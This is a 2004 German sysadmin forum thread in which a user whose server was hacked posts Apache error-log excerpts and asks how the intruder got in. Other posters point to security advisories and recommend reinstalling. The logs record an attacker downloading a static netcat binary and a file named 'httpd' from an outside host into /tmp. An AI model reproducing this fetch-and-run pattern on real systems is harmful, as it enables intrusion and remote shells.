RootForum Community

Resources for System-Administrators
https://www.rootforum.org/forum/

Was bedeuten diese Einträge?

https://www.rootforum.org/forum/viewtopic.php?t=26716

Page 1 of 1

Was bedeuten diese Einträge?

Posted: 2004-05-26 16:28
by anmu
Mein Server ist gehackt worden und nun suche ich nach der Lücke. Ich habe nur die wirklich nötigen Dienste aktiv (pop, mail, ssh, apache, bind und ftp) und habe in den entsprechenden Logfiles gestöbert. Dabei bin ich im error_log vom Apache auf folgendes gestoßen:

Code: Select all

--22:53:23--  http://www.stearns.org/nc/nc-static-exec
           => `nc-static-exec'
Resolving www.stearns.org... done.
Connecting to www.stearns.org[66.59.111.182]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 484,782 [text/plain]

    0K .......... .......... .......... .......... .......... 10%  125.31 KB/s
   50K .......... .......... .......... .......... .......... 21%  471.70 KB/s
  100K .......... .......... .......... .......... .......... 31%  561.80 KB/s
  150K .......... .......... .......... .......... .......... 42%  943.40 KB/s
  200K .......... .......... .......... .......... .......... 52%  625.00 KB/s
  250K .......... .......... .......... .......... .......... 63%  543.48 KB/s
  300K .......... .......... .......... .......... .......... 73%  588.24 KB/s
  350K .......... .......... .......... .......... .......... 84%  561.80 KB/s
  400K .......... .......... .......... .......... .......... 95% 1000.00 KB/s
  450K .......... .......... ...                             100%  418.21 KB/s

22:53:24 (430.77 KB/s) - `nc-static-exec' saved [484782/484782]
Dasselbe kommt dann nochmal mit nc-static-exec.1

Und dann, etwas später:

Code: Select all

--10:54:30--  http://zsuattshellz.homeip.net/%7Earanyos/httpd
           => `/tmp/session_mm_apache0/httpd'
Resolving zsuattshellz.homeip.net... done.
Connecting to zsuattshellz.homeip.net[62.79.123.79]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,473 [text/plain]

    0K .......... .......... ......                          100%   19.15 KB/s

10:54:31 (19.15 KB/s) - `/tmp/session_mm_apache0/httpd' saved [27473/27473]

mkdir: cannot create directory `/tmp/session_mm_apache0': File exists
/tmp/session_mm_apache0/httpd: Text file busy
Note:  nslookup is deprecated and may be removed from future releases.
Consider using the `dig' or `host' programs instead.  Run nslookup with
the `-sil[ent]' option to prevent this message from appearing.
Note:  nslookup is deprecated and may be removed from future releases.
Consider using the `dig' or `host' programs instead.  Run nslookup with
the `-sil[ent]' option to prevent this message from appearing.
Und dann folgen ca. 35000 Zeilen dieser Art:

Code: Select all

/tmp/session_mm_apache0/updatedb: line 2: ado.txt: Permission denied
/tmp/session_mm_apache0/updatedb: line 2: ado.txt: Permission denied
/tmp/session_mm_apache0/updatedb: line 8: lynx: command not found
/tmp/session_mm_apache0/updatedb: line 8: lynx: command not found
Kann hier jemand eine Sicherheitslücke im Apache (1.3.26, 1und1-root-Server vom Sommer letzten Jahres) ausgenutzt haben? Oder muß ich woanders suchen?

Auf einen von mir selbst aufgesetzten Server würde ich ohne zu fragen den Apache updaten (auf 1.3.31), aber bei dem 1und1-Server bin ich mir nicht sicher, was da alles included (für php, mysql, perl und welche Module) ist...

Re: Was bedeuten diese Einträge?

Posted: 2004-05-26 16:34
by anmu
Noch einen Hinweis: Mögliche Attacks halte ich von intern relativ ausgeschlossen (also vorher Hochladen einer Datei, die dann vom Apache gestartet wird). Wenn, dann müßten dies Attacks von außen sein...

Any Ideas?

Anmu

Re: Was bedeuten diese Einträge?

Posted: 2004-05-26 17:29
by silentfog

Code: Select all

The nc package contains Netcat (the program is actually nc), a simple
utility for reading and writing data across network connections, using
the TCP or UDP protocols. Netcat is intended to be a reliable back-end
tool which can be used directly or easily driven by other programs and
scripts.  Netcat is also a feature-rich network debugging and
exploration tool, since it can create many different connections and
has many built-in capabilities.

You may want to install the netcat package if you are administering a
network and you'd like to use its debugging and network exploration
capabilities.
netcat 1.10 ist standarmäßig installiert.

Re: Was bedeuten diese Einträge?

Posted: 2004-05-26 17:53
by captaincrunch
Kann hier jemand eine Sicherheitslücke im Apache (1.3.26, 1und1-root-Server vom Sommer letzten Jahres) ausgenutzt haben?
Such dir eine aus:
http://www.suse.de/de/security/announcements/index.html

Besonders beliebt sind die Kernel-Bugs.

Re: Was bedeuten diese Einträge?

Posted: 2004-05-26 17:54
by silentfog
CaptainCrunch wrote:
Kann hier jemand eine Sicherheitslücke im Apache (1.3.26, 1und1-root-Server vom Sommer letzten Jahres) ausgenutzt haben?
Such dir eine aus:
http://www.suse.de/de/security/announcements/index.html

Besonders beliebt sind die Kernel-Bugs.
:oops: Da war der CC wieder schneller :wink:

Re: Was bedeuten diese Einträge?

Posted: 2004-05-26 21:24
by anmu
Ich habe per Konsole yast2 gestartet und versuche mich nun mit dem Online Update. Es sagt mir, daß ich Suse 8.1 habe und bietet mir insgesamt 26 ausgewählte Updates an. Sicherheitshalber wollte ich mit ein paar einfacheren anfangen, aber egal, was ich auswähle, ich bekomme nach dem Starten immer ein "Download failed". Zuerst kommt ein "Retrieving ...", dann Download finished" und dann in einem gerahmten Feld "Error, Download failed."

Hier im Forum und bei Google habe ich zu diesem speziellen Problem nichts gefunden...

Muß ich die Patches alle per Hand einspielen?? Ein Autoupdate oder alle auf einmal wollte ich lieber nicht ausprobieren...

Anmu

Re: Was bedeuten diese Einträge?

Posted: 2004-05-26 21:48
by silentfog
anmu wrote:... yast2...
Hallo - dachte dies wäre yast ... egal

Hast Du die Sec.Updates korrekt selektiert gehabt ?

Re: Was bedeuten diese Einträge?

Posted: 2004-05-26 22:57
by dodolin
Muß ich die Patches alle per Hand einspielen??
Du sollst überhaupt keine Patches einspielen. Du sollst die Kiste platt machen und neu aufsetzen! :!:

Re: Was bedeuten diese Einträge?

Posted: 2004-05-26 23:49
by silentfog
dodolin wrote:
Muß ich die Patches alle per Hand einspielen??
Du sollst überhaupt keine Patches einspielen. Du sollst die Kiste platt machen und neu aufsetzen! :!:
:? Dachte, er meinte Sec.Patches einspielen, nach "Neuaufsetzung" des Basissystems ... Zumindest im Fall 1+1 muß der Apache2 gepatched werden ...
All times are UTC+02:00
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited